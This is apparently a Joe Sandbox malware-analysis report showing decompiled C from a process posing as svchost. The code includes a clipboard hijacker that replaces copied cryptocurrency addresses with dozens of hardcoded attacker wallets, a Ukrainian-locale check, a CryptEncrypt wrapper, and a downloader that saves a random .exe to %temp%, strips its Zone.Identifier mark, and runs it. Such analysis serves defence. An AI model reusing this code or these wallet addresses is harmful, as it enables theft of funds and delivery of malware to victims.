Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
API String ID: 92872011-445461498
Opcode ID: 4909064d94497af1a13452f78424a937150fad7d7046325efcb5773774a48aa5
Instruction ID: 73feb575b6f09e115ea4410ee3c93714f8b02bdc92ec33619af1942f01d9ecb2
Opcode Fuzzy Hash: 4909064d94497af1a13452f78424a937150fad7d7046325efcb5773774a48aa5
Instruction Fuzzy Hash: 033132B5500218ABCB60EBA4DC88FEA777CBB48701F448689F60993153DA35AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00AB16F0, Relevance: 7.6, APIs: 5, Instructions: 79
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00AB16F0(void* _a4, int _a8, void* _a12, void* _a16, intOrPtr _a20) {
				long* _v8;
				char _v9;
				short _v11;
				char _v15;
				char _v19;
				char _v23;
				void _v24;
				char _v27;
				int _v28;
				char _v31;
				intOrPtr _v32;
				char _v35;
				char _v36;
				char _v37;
				int _v44;
				int _v48;
				signed int _t47;
				long* _t60;

				_v37 = 0;
				_v36 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				_v11 = 0;
				_v9 = 0;
				_v36 = 8;
				_v35 = 2;
				_v32 = 0x6801;
				if(_a20 >= 0x10) {
					_v48 = 0x10;
				} else {
					_v48 = _a20;
				}
				_v28 = _v48;
				memcpy( &_v24, _a16, _v28);
				memcpy(_a12, _a4, _a8);
				_v8 = 0;
				_t60 =  *0xaba8a0; // 0x84f430
				if(CryptImportKey(_t60,  &_v36, 0x1c, 0, 0,  &_v8) != 0) {
					_v44 = _a8;
					_t47 = _a12;
					__imp__CryptEncrypt(_v8, 0, 1, 0, _t47,  &_v44, _v44);
					asm("sbb eax, eax");
					_v37 =  ~( ~_t47);
					CryptDestroyKey(_v8);
				}
				return _v37;
			}

0x00ab16f6
0x00ab16fa
0x00ab1700
0x00ab1703
0x00ab1706
0x00ab1709
0x00ab170c
0x00ab170f
0x00ab1712
0x00ab1716
0x00ab1719
0x00ab171d
0x00ab1721
0x00ab172c
0x00ab1736
0x00ab172e
0x00ab1731
0x00ab1731
0x00ab1740
0x00ab174f
0x00ab1763
0x00ab176b
0x00ab1780
0x00ab178f
0x00ab1794
0x00ab179f
0x00ab17ad
0x00ab17b5
0x00ab17b9
0x00ab17c0
0x00ab17c0
0x00ab17cc

APIs

memcpy.MSVCRT ref: 00AB174F
memcpy.MSVCRT ref: 00AB1763
CryptImportKey.ADVAPI32(0084F430,00000008,0000001C,00000000,00000000,00000000), ref: 00AB1787
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 00AB17AD
CryptDestroyKey.ADVAPI32(00000000), ref: 00AB17C0

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: Crypt$memcpy$DestroyEncryptImport
String ID:
API String ID: 774555595-0
Opcode ID: 6476236deb1dde767e5eb609ac7bc6cb6737e442af4074f5eb661ff7dc7f9978
Instruction ID: 028f6d9ad0e8791fc42426f280b8d2b1a6948ac28cf8b0a9234f67de2b59fcc4
Opcode Fuzzy Hash: 6476236deb1dde767e5eb609ac7bc6cb6737e442af4074f5eb661ff7dc7f9978
Instruction Fuzzy Hash: 633127B5D00249EFDB00CFE8C881BEEBBB9BF48300F048159E905B7281D7749A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00AB28E0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB28E0() {
				char _v16;

				memset( &_v16, 0, 0xa);
				GetLocaleInfoA(0x400, 7,  &_v16, 0xa);
				if(strcmp( &_v16, "UKR") != 0) {
					return 0;
				}
				return 1;
			}

0x00ab28ee
0x00ab2903
0x00ab291c
0x00000000
0x00ab2922
0x00000000

APIs

memset.MSVCRT ref: 00AB28EE
GetLocaleInfoA.KERNEL32(00000400,00000007,00000000,0000000A,?,?,?,00000000,?,0000000A), ref: 00AB2903
strcmp.MSVCRT ref: 00AB2912

Strings

UKR, xrefs: 00AB2909

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: InfoLocalememsetstrcmp
String ID: UKR
API String ID: 3255129521-64918367
Opcode ID: 8ab39a8fdb4a3ece48d74d362e1bfd44f72dd429d64e7bb87974790e9f686174
Instruction ID: 919dfbc5575eadbecd7ceeff6fc2a42214960aa5720c49ecb6b96090a9a62602
Opcode Fuzzy Hash: 8ab39a8fdb4a3ece48d74d362e1bfd44f72dd429d64e7bb87974790e9f686174
Instruction Fuzzy Hash: 88E0D87AE4430476DA10B6F09C03FE9332C6721B01F004154FB085A0C3F5B4661887A2

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1000, Relevance: 95.0, APIs: 12, Strings: 42, Instructions: 471
clipboardstringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00AB1000(char* _a4) {
				int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				void* _v24;
				struct HWND__* _v28;
				int _t143;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t150;
				void* _t164;
				void* _t165;
				void* _t167;
				void* _t186;
				void* _t188;
				void* _t189;
				char _t191;
				void* _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t335;
				void* _t336;

				_v20 = 0;
				_t143 = strlen(_a4);
				_t326 = _t325 + 4;
				_v8 = _t143;
				if( *_a4 != 0x31 &&  *_a4 != 0x33 &&  *_a4 != 0x58 &&  *_a4 != 0x44 &&  *_a4 != 0x30 &&  *_a4 != 0x4c &&  *_a4 != 0x72 &&  *_a4 != 0x54 &&  *_a4 != 0x74 &&  *_a4 != 0x68 &&  *_a4 != 0x51 &&  *_a4 != 0x52 &&  *_a4 != 0x4e &&  *_a4 != 0x41 &&  *_a4 != 0x53 &&  *_a4 != 0x7a &&  *_a4 != 0x73 &&  *_a4 != 0x71 &&  *_a4 != 0x63 &&  *_a4 != 0x34 &&  *_a4 != 0x61 &&  *_a4 != 0x46 &&  *_a4 != 0x47 &&  *_a4 != 0x62 &&  *_a4 != 0x55 &&  *_a4 != 0x45 &&  *_a4 != 0x42) {
					return 0;
				}
				if( *_a4 != 0x34) {
					_t145 = E00AB1620(_a4, "bitcoincash:");
					_t327 = _t326 + 8;
					if(_t145 == 0) {
						_t146 = E00AB1620(_a4, "cosmos");
						_t328 = _t327 + 8;
						if(_t146 == 0) {
							_t147 = E00AB1620(_a4, "addr");
							_t328 = _t328 + 8;
							if(_t147 == 0) {
								if( *_a4 == 0x55 ||  *_a4 == 0x45 ||  *_a4 == 0x42) {
									if(_v8 == 9) {
										goto L57;
									}
									return 0;
								} else {
									if(_v8 < 0x15 || _v8 > 0x38) {
										return 0;
									} else {
										goto L57;
									}
								}
							}
							if(_v8 < 0x62 || _v8 > 0x69) {
								return 0;
							} else {
								goto L57;
							}
						}
						if(_v8 < 0x2a || _v8 > 0x30) {
							return 0;
						} else {
							goto L57;
						}
					}
					if(_v8 < 0x32 || _v8 > 0x38) {
						return 0;
					} else {
						goto L57;
					}
				} else {
					if(_v8 < 0x5a || _v8 > 0x73) {
						return 0;
					} else {
						L57:
						_t150 = E00AB1620(_a4, "bitcoincash:");
						_t329 = _t328 + 8;
						if(_t150 != 0) {
							L70:
							if( *_a4 == 0x31) {
								if(_v8 != 0x15) {
									if(_v8 != 0x30) {
										_v12 = "1FGzLF98d6Uv7P4YH7J4FF4bU599qtZNSk";
									} else {
										_v12 = "12sNWkfRAweJAAc3kw2cRAxcivya6jB6euAp7VVYQgq9Cbj1";
									}
								} else {
									_v12 = "10828018954959502448L";
								}
							}
							if( *_a4 == 0x33) {
								_v12 = "3JHbgxWSZzvG73eeMZuTvV8LaCwPaSwH5e";
							}
							if( *_a4 == 0x71) {
								_v12 = "qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj";
							}
							if( *_a4 == 0x58) {
								_v12 = "XhWmmLwQr1TEACBVaz9uXxwd83bz4a5Kp9";
							}
							if( *_a4 == 0x44) {
								_v12 = "DQzK3cvLHL51kPqXrFxKNzxNYrXtgTUsan";
							}
							if( *_a4 == 0x30) {
								_v12 = "0x2F1A943E9a5c200BC685C0f0E30e8D617b75c9E6";
							}
							if( *_a4 == 0x4c) {
								_v12 = "LSmkLAiDT3acWcRB7VkYoi41DUoEixusix";
							}
							if( *_a4 == 0x72) {
								_v12 = "rBph5FwQDLfmTdUY3McSCHHvPh5ffoW2LG";
							}
							if( *_a4 == 0x54) {
								_v12 = "TPVRSFAS59sQwH9jDiqQLaeXhFRVEFurPQ";
							}
							if( *_a4 == 0x74) {
								_v12 = "t1URDzZXrWRRL8C1tRqtibK9VBRNwpvpNU3";
							}
							if( *_a4 == 0x68) {
								_v12 = "hx2cf5c806d6018b836192c9438d4968e5b276de09";
							}
							if( *_a4 == 0x51) {
								_v12 = "QSKnYEtmjoB8woXupuXi886TKhCmqqYukM";
							}
							if( *_a4 == 0x52) {
								_v12 = "RBA2BBrCMzhhRYc5hwZe94fMneerdbc12M";
							}
							if( *_a4 == 0x4e) {
								_v12 = "NC3PIUBMK5UDEC77T6HCMAYIEU2MD34FLVGFECFP";
							}
							if( *_a4 == 0x41) {
								_v12 = "AXmdnTwZTtJihRwpd8HRQDEr6dEwXohGy9";
							}
							if( *_a4 == 0x53) {
								_v12 = "SdNRyZDBTeg9iaSnDgDKJTBZuXCojAwkzh";
							}
							if( *_a4 == 0x7a) {
								_v12 = "zil1kfzvsmq5lsej4j88krv6gwshpj3ngre5fr9rau";
							}
							if( *_a4 == 0x73) {
								_v12 = "s1cVz9fwAtYoThbcqWTvEfTznfeUb3tDS1r";
							}
							_t164 = E00AB1620(_a4, "bitcoincash");
							_t330 = _t329 + 8;
							if(_t164 != 0) {
								_v12 = "bitcoincash:qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj";
							}
							_t165 = E00AB1620(_a4, "cosmos");
							_t331 = _t330 + 8;
							if(_t165 != 0) {
								_v12 = "cosmos1fw3x9atn2vwzuvmsm57xwd6q0kev2kqdun9aft";
							}
							if( *_a4 == 0x34) {
								_v12 = "4Aap1n942WybmwMtxXGVnUZsXhkhzBUU9QnkzN3m7Lyo8ohPFCxKAeLawZ5hCm9k16hEbbygxcsCrKRVnWhEfMESCN2tEoj";
							}
							_t167 = E00AB1620(_a4, "addr");
							_t332 = _t331 + 8;
							if(_t167 != 0) {
								_v12 = "addr1qxmw6egqfgv7j46rmcttyp4tshehfy6zpdg7fsr4l483ky54unzcs22er28vc2fzflsxxxlum5dl28mncz7aq8t9khys37pt2n";
							}
							if( *_a4 == 0x46) {
								_v12 = "FjShn9sWBbATYz5fADHXhkrv8ER7UjdKpX";
							}
							if( *_a4 == 0x47) {
								_v12 = "GBQOR5U76QPW4VRAETF37FHRTZNLMQS5I3SOCZMFK2ICJROOMKPWMKF4";
							}
							if( *_a4 != 0x62) {
								L129:
								if( *_a4 == 0x55) {
									_v12 = "U28040101";
								}
								if( *_a4 == 0x45) {
									_v12 = "E24912861";
								}
								if( *_a4 == 0x42) {
									_v12 = "B28124780";
								}
								_v16 = strlen(_v12);
								_v24 = GlobalAlloc(0x2002, _v16 + 1);
								_v20 = GlobalLock(_v24);
								memcpy(_v20, _v12, _v16 + 1);
								GlobalUnlock(_v24);
								if(OpenClipboard(0) != 0) {
									EmptyClipboard();
									SetClipboardData(1, _v24);
									CloseClipboard();
								}
								return 1;
							} else {
								_t186 = E00AB1620(_a4, "bnb");
								_t335 = _t332 + 8;
								if(_t186 != 0) {
									_v12 = "bnb1dvgnqudkvrkx5674p9ayqxhaqqh3ewwppyqzp";
								}
								_t188 = E00AB1620(_a4, "band");
								_t336 = _t335 + 8;
								if(_t188 != 0) {
									_v12 = "band1cxp0d4yrdylm93nl3l5xdjmludftd49nf6lx75";
								}
								_t189 = E00AB1620(_a4, "bc");
								_t332 = _t336 + 8;
								if(_t189 != 0) {
									_v12 = "bc1qlumv78ht05dzdjaffdltlnruwdhuj535cx9j4n";
								}
								goto L129;
							}
						}
						_v28 = 0;
						while(_v28 < _v8) {
							if( *_a4 != 0x31 || _a4[_v28] != 0x4f && _a4[_v28] != 0x49 && _a4[_v28] != 0x6c) {
								_t191 = _a4[_v28];
								_push(_t191);
								L00AB5582();
								_t329 = _t329 + 4;
								if(_t191 != 0) {
									L69:
									_v28 =  &(_v28->i);
									continue;
								}
								_push(_a4[_v28]);
								L00AB557C();
								_t329 = _t329 + 4;
								if(_t191 != 0) {
									goto L69;
								}
								return 0;
							} else {
								return 0;
							}
						}
						goto L70;
					}
				}
			}

0x00ab1006
0x00ab1011
0x00ab1016
0x00ab1019
0x00ab1025
0x00000000
0x00ab1185
0x00ab1195
0x00ab11b8
0x00ab11bd
0x00ab11c2
0x00ab11e5
0x00ab11ea
0x00ab11ef
0x00ab120f
0x00ab1214
0x00ab1219
0x00ab1239
0x00ab1255
0x00000000
0x00ab125e
0x00000000
0x00ab1260
0x00ab1264
0x00000000
0x00000000
0x00000000
0x00000000
0x00ab1264
0x00ab1239
0x00ab121f
0x00000000
0x00ab122e
0x00000000
0x00ab122e
0x00ab121f
0x00ab11f5
0x00000000
0x00ab1204
0x00000000
0x00ab1204
0x00ab11f5
0x00ab11c8
0x00000000
0x00ab11d7
0x00000000
0x00ab11d7
0x00ab1197
0x00ab119b
0x00000000
0x00ab11aa
0x00ab1273
0x00ab127c
0x00ab1281
0x00ab1286
0x00ab131a
0x00ab1323
0x00ab1329
0x00ab1338
0x00ab1343
0x00ab133a
0x00ab133a
0x00ab133a
0x00ab132b
0x00ab132b
0x00ab132b
0x00ab1329
0x00ab1353
0x00ab1355
0x00ab1355
0x00ab1365
0x00ab1367
0x00ab1367
0x00ab1377
0x00ab1379
0x00ab1379
0x00ab1389
0x00ab138b
0x00ab138b
0x00ab139b
0x00ab139d
0x00ab139d
0x00ab13ad
0x00ab13af
0x00ab13af
0x00ab13bf
0x00ab13c1
0x00ab13c1
0x00ab13d1
0x00ab13d3
0x00ab13d3
0x00ab13e3
0x00ab13e5
0x00ab13e5
0x00ab13f5
0x00ab13f7
0x00ab13f7
0x00ab1407
0x00ab1409
0x00ab1409
0x00ab1419
0x00ab141b
0x00ab141b
0x00ab142b
0x00ab142d
0x00ab142d
0x00ab143d
0x00ab143f
0x00ab143f
0x00ab144f
0x00ab1451
0x00ab1451
0x00ab1461
0x00ab1463
0x00ab1463
0x00ab1473
0x00ab1475
0x00ab1475
0x00ab1485
0x00ab148a
0x00ab148f
0x00ab1491
0x00ab1491
0x00ab14a1
0x00ab14a6
0x00ab14ab
0x00ab14ad
0x00ab14ad
0x00ab14bd
0x00ab14bf
0x00ab14bf
0x00ab14cf
0x00ab14d4
0x00ab14d9
0x00ab14db
0x00ab14db
0x00ab14eb
0x00ab14ed
0x00ab14ed
0x00ab14fd
0x00ab14ff
0x00ab14ff
0x00ab150f
0x00ab1565
0x00ab156e
0x00ab1570
0x00ab1570
0x00ab1580
0x00ab1582
0x00ab1582
0x00ab1592
0x00ab1594
0x00ab1594
0x00ab15a7
0x00ab15bc
0x00ab15c9
0x00ab15db
0x00ab15e7
0x00ab15f7
0x00ab15f9
0x00ab1605
0x00ab160b
0x00ab160b
0x00000000
0x00ab1511
0x00ab151a
0x00ab151f
0x00ab1524
0x00ab1526
0x00ab1526
0x00ab1536
0x00ab153b
0x00ab1540
0x00ab1542
0x00ab1542
0x00ab1552
0x00ab1557
0x00ab155c
0x00ab155e
0x00ab155e
0x00000000
0x00ab155c
0x00ab150f
0x00ab128c
0x00ab129e
0x00ab12af
0x00ab12e8
0x00ab12eb
0x00ab12ec
0x00ab12f1
0x00ab12f6
0x00ab1315
0x00ab129b
0x00000000
0x00ab129b
0x00ab1301
0x00ab1302
0x00ab1307
0x00ab130c
0x00000000
0x00000000
0x00000000
0x00ab12db
0x00000000
0x00ab12db
0x00ab12af
0x00000000
0x00ab129e
0x00ab119b

APIs

strlen.MSVCRT ref: 00AB1011
isalpha.MSVCRT ref: 00AB12EC
isdigit.MSVCRT ref: 00AB1302
strlen.MSVCRT ref: 00AB159F
GlobalAlloc.KERNEL32(00002002,?), ref: 00AB15B6
GlobalLock.KERNEL32 ref: 00AB15C3
memcpy.MSVCRT ref: 00AB15DB
GlobalUnlock.KERNEL32(?), ref: 00AB15E7
OpenClipboard.USER32(00000000), ref: 00AB15EF
EmptyClipboard.USER32 ref: 00AB15F9
SetClipboardData.USER32 ref: 00AB1605
CloseClipboard.USER32 ref: 00AB160B

Strings

bitcoincash:, xrefs: 00AB11AF
12sNWkfRAweJAAc3kw2cRAxcivya6jB6euAp7VVYQgq9Cbj1, xrefs: 00AB133A
NC3PIUBMK5UDEC77T6HCMAYIEU2MD34FLVGFECFP, xrefs: 00AB142D
hx2cf5c806d6018b836192c9438d4968e5b276de09, xrefs: 00AB13F7
qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj, xrefs: 00AB1367
t1URDzZXrWRRL8C1tRqtibK9VBRNwpvpNU3, xrefs: 00AB13E5
B28124780, xrefs: 00AB1594, 00AB159E, 00AB15D6
4Aap1n942WybmwMtxXGVnUZsXhkhzBUU9QnkzN3m7Lyo8ohPFCxKAeLawZ5hCm9k16hEbbygxcsCrKRVnWhEfMESCN2tEoj, xrefs: 00AB14BF, 00AB14CE
TPVRSFAS59sQwH9jDiqQLaeXhFRVEFurPQ, xrefs: 00AB13D3
bnb1dvgnqudkvrkx5674p9ayqxhaqqh3ewwppyqzp, xrefs: 00AB1526, 00AB1535
s1cVz9fwAtYoThbcqWTvEfTznfeUb3tDS1r, xrefs: 00AB1475, 00AB1484
LSmkLAiDT3acWcRB7VkYoi41DUoEixusix, xrefs: 00AB13AF
XhWmmLwQr1TEACBVaz9uXxwd83bz4a5Kp9, xrefs: 00AB1379
SdNRyZDBTeg9iaSnDgDKJTBZuXCojAwkzh, xrefs: 00AB1451
addr1qxmw6egqfgv7j46rmcttyp4tshehfy6zpdg7fsr4l483ky54unzcs22er28vc2fzflsxxxlum5dl28mncz7aq8t9khys37pt2n, xrefs: 00AB14DB
bitcoincash:, xrefs: 00AB1273
FjShn9sWBbATYz5fADHXhkrv8ER7UjdKpX, xrefs: 00AB14ED
E24912861, xrefs: 00AB1582
bitcoincash, xrefs: 00AB147C
bc1qlumv78ht05dzdjaffdltlnruwdhuj535cx9j4n, xrefs: 00AB155E
10828018954959502448L, xrefs: 00AB132B
0x2F1A943E9a5c200BC685C0f0E30e8D617b75c9E6, xrefs: 00AB139D
U28040101, xrefs: 00AB1570
rBph5FwQDLfmTdUY3McSCHHvPh5ffoW2LG, xrefs: 00AB13C1
zil1kfzvsmq5lsej4j88krv6gwshpj3ngre5fr9rau, xrefs: 00AB1463
band1cxp0d4yrdylm93nl3l5xdjmludftd49nf6lx75, xrefs: 00AB1542, 00AB1551
cosmos, xrefs: 00AB1498
0, xrefs: 00AB1334
cosmos, xrefs: 00AB11DC
QSKnYEtmjoB8woXupuXi886TKhCmqqYukM, xrefs: 00AB1409
addr, xrefs: 00AB1206
3JHbgxWSZzvG73eeMZuTvV8LaCwPaSwH5e, xrefs: 00AB1355
bitcoincash:qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj, xrefs: 00AB1491, 00AB14A0
AXmdnTwZTtJihRwpd8HRQDEr6dEwXohGy9, xrefs: 00AB143F
DQzK3cvLHL51kPqXrFxKNzxNYrXtgTUsan, xrefs: 00AB138B
bnb, xrefs: 00AB1511
cosmos1fw3x9atn2vwzuvmsm57xwd6q0kev2kqdun9aft, xrefs: 00AB14AD
band, xrefs: 00AB152D
RBA2BBrCMzhhRYc5hwZe94fMneerdbc12M, xrefs: 00AB141B
addr, xrefs: 00AB14C6
GBQOR5U76QPW4VRAETF37FHRTZNLMQS5I3SOCZMFK2ICJROOMKPWMKF4, xrefs: 00AB14FF, 00AB1519
1FGzLF98d6Uv7P4YH7J4FF4bU599qtZNSk, xrefs: 00AB1343

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: Clipboard$Global$strlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
String ID: 0$0x2F1A943E9a5c200BC685C0f0E30e8D617b75c9E6$10828018954959502448L$12sNWkfRAweJAAc3kw2cRAxcivya6jB6euAp7VVYQgq9Cbj1$1FGzLF98d6Uv7P4YH7J4FF4bU599qtZNSk$3JHbgxWSZzvG73eeMZuTvV8LaCwPaSwH5e$4Aap1n942WybmwMtxXGVnUZsXhkhzBUU9QnkzN3m7Lyo8ohPFCxKAeLawZ5hCm9k16hEbbygxcsCrKRVnWhEfMESCN2tEoj$AXmdnTwZTtJihRwpd8HRQDEr6dEwXohGy9$B28124780$DQzK3cvLHL51kPqXrFxKNzxNYrXtgTUsan$E24912861$FjShn9sWBbATYz5fADHXhkrv8ER7UjdKpX$GBQOR5U76QPW4VRAETF37FHRTZNLMQS5I3SOCZMFK2ICJROOMKPWMKF4$LSmkLAiDT3acWcRB7VkYoi41DUoEixusix$NC3PIUBMK5UDEC77T6HCMAYIEU2MD34FLVGFECFP$QSKnYEtmjoB8woXupuXi886TKhCmqqYukM$RBA2BBrCMzhhRYc5hwZe94fMneerdbc12M$SdNRyZDBTeg9iaSnDgDKJTBZuXCojAwkzh$TPVRSFAS59sQwH9jDiqQLaeXhFRVEFurPQ$U28040101$XhWmmLwQr1TEACBVaz9uXxwd83bz4a5Kp9$addr$addr$addr1qxmw6egqfgv7j46rmcttyp4tshehfy6zpdg7fsr4l483ky54unzcs22er28vc2fzflsxxxlum5dl28mncz7aq8t9khys37pt2n$band$band1cxp0d4yrdylm93nl3l5xdjmludftd49nf6lx75$bc1qlumv78ht05dzdjaffdltlnruwdhuj535cx9j4n$bitcoincash$bitcoincash:$bitcoincash:$bitcoincash:qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj$bnb$bnb1dvgnqudkvrkx5674p9ayqxhaqqh3ewwppyqzp$cosmos$cosmos$cosmos1fw3x9atn2vwzuvmsm57xwd6q0kev2kqdun9aft$hx2cf5c806d6018b836192c9438d4968e5b276de09$qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj$rBph5FwQDLfmTdUY3McSCHHvPh5ffoW2LG$s1cVz9fwAtYoThbcqWTvEfTznfeUb3tDS1r$t1URDzZXrWRRL8C1tRqtibK9VBRNwpvpNU3$zil1kfzvsmq5lsej4j88krv6gwshpj3ngre5fr9rau
API String ID: 2251388001-2807189545
Opcode ID: 2d26764d0a6b01273df43a12084f575cc670c2d881e60d18444b19a69d47ab79
Instruction ID: 29b11f4d0faa5a84130ddd73f61b42d6f666b12708fc7921b1b9204ade69b99f
Opcode Fuzzy Hash: 2d26764d0a6b01273df43a12084f575cc670c2d881e60d18444b19a69d47ab79
Instruction Fuzzy Hash: 79124B75A04288ABCB14CF54D4F45FE7FBAAF43356FA48199D8459F253C6399A80CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00AB19F0, Relevance: 66.7, APIs: 32, Strings: 6, Instructions: 215
filesleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00AB19F0(char* _a4) {
				short _v524;
				short _v1044;
				signed int _v1045;
				short _v1572;
				void* _v1576;
				void* _v1580;
				short _v2100;
				void _v2620;
				long _v2624;
				long _v2628;
				void* _v2632;
				signed int _t70;
				signed int _t72;
				int _t78;
				signed int _t79;
				signed int _t81;
				signed char _t106;
				signed char _t109;
				void* _t150;
				void* _t153;
				void* _t158;

				_v1045 = 0;
				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x208);
				mbstowcs( &_v1044, _a4, strlen(_a4) + 1);
				_t70 = rand();
				asm("cdq");
				_t72 = rand();
				asm("cdq");
				wsprintfW( &_v1572, L"%ls\\%d%d.exe",  &_v2100, _t72 % 0x7530 + 0x2710, _t70 % 0x7530 + 0x2710);
				_t153 = _t150 + 0x24;
				_v2632 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
				if(_v2632 == 0) {
					L14:
					InternetCloseHandle(_v2632);
					Sleep(0x3e8);
					_t78 = _v1045 & 0x000000ff;
					if(_t78 != 0) {
						L19:
						return _t78;
					}
					_t79 = rand();
					asm("cdq");
					_t81 = rand();
					asm("cdq");
					_t78 = wsprintfW( &_v1572, L"%ls\\%d%d.exe",  &_v2100, _t81 % 0x7530 + 0x2710, _t79 % 0x7530 + 0x2710);
					_push(0);
					_push(0);
					_push( &_v1572);
					_push( &_v1044);
					_push(0);
					L00AB57AC();
					if(_t78 != 0) {
						goto L19;
					}
					wsprintfW( &_v524, L"%ls:Zone.Identifier",  &_v1572);
					DeleteFileW( &_v524);
					Sleep(0x3e8);
					if((E00AB17D0( &_v1572) & 0x000000ff) == 0) {
						return DeleteFileW( &_v1572);
					}
					Sleep(0x3e8);
					return E00AB2730( &_v1572);
				}
				_v1576 = InternetOpenUrlW(_v2632,  &_v1044, 0, 0, 0, 0);
				if(_v1576 == 0) {
					L13:
					InternetCloseHandle(_v1576);
					goto L14;
				}
				_v1580 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0);
				if(_v1580 == 0xffffffff) {
					L12:
					CloseHandle(_v1580);
					goto L13;
				}
				memset( &_v2620, 0, 0x208);
				_t158 = _t153 + 0xc;
				while(InternetReadFile(_v1576,  &_v2620, 0x207,  &_v2628) != 0 && _v2628 != 0) {
					WriteFile(_v1580,  &_v2620, _v2628,  &_v2624, 0);
				}
				CloseHandle(_v1580);
				Sleep(0x3e8);
				wsprintfW( &_v524, L"%ls:Zone.Identifier",  &_v1572);
				DeleteFileW( &_v524);
				Sleep(0x3e8);
				_t106 = E00AB17D0( &_v1572);
				_t153 = _t158 + 0x10;
				if((_t106 & 0x000000ff) == 0) {
					DeleteFileW( &_v1572);
				} else {
					Sleep(0x3e8);
					_t109 = E00AB2730( &_v1572);
					_t153 = _t153 + 4;
					if((_t109 & 0x000000ff) == 1) {
						_v1045 = 1;
					}
				}
				goto L12;
			}

0x00ab19f9
0x00ab1a11
0x00ab1a32
0x00ab1a3a
0x00ab1a3f
0x00ab1a4e
0x00ab1a53
0x00ab1a75
0x00ab1a7b
0x00ab1a91
0x00ab1a9e
0x00ab1c1f
0x00ab1c26
0x00ab1c31
0x00ab1c37
0x00ab1c40
0x00ab1d1d
0x00ab1d1d
0x00ab1d1d
0x00ab1c46
0x00ab1c4b
0x00ab1c5a
0x00ab1c5f
0x00ab1c81
0x00ab1c8a
0x00ab1c8c
0x00ab1c94
0x00ab1c9b
0x00ab1c9c
0x00ab1c9e
0x00ab1ca5
0x00000000
0x00000000
0x00ab1cba
0x00ab1cca
0x00ab1cd5
0x00ab1cef
0x00000000
0x00ab1d14
0x00ab1cf6
0x00000000
0x00ab1d08
0x00ab1ac0
0x00ab1acd
0x00ab1c12
0x00ab1c19
0x00000000
0x00ab1c19
0x00ab1aef
0x00ab1afc
0x00ab1c05
0x00ab1c0c
0x00000000
